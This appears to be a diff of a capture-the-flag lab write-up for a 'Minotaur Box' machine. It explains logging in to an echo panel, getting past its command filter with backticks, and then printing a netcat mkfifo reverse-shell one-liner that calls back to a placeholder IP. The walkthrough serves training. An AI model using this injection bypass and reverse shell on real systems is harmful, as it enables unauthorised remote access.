spayc/minotaur-box/Minotaur-Box_Writeup.md

 now login with the new userinformation you got
-user: M!n0taur password: aminotauro and a link to an pannel called "secret echo pannel" there you can echo some your input out witch internally executes the echo command but you somhow have to bypass the filters and gain RCE when you find out `` is permitted and you execute commands with it (you have to execute them seperatly at ';' because this char is filterd ) the best way to bypass the filter is just with a base64 encoded reverse shell payload
+user: M!n0taur password: aminotauro and a link to an pannel called "secret echo pannel" there you can echo some your input out witch internally executes the echo command but you somehow have to bypass the filters and gain RCE when you find out `` is permitted and you execute commands with it (you have to execute them severalty at ';' because this char is filtered ) the best way to bypass the filter is just with a base64 encoded reverse shell payload

 ```rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc YOUR_IP 4243 >/tmp/f ```